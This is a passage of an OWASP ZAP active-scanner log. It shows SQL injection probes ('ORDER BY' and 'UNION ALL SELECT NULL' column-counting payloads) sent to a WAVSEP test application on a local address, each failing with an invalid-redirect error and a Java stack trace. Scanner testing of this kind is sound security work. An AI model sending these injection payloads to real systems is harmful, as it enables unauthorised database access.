to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682512 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682512 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682513 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682514 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 9227-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 9227-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682515 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682516 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682517 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682517 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682518 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682519 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682520 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682521 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at 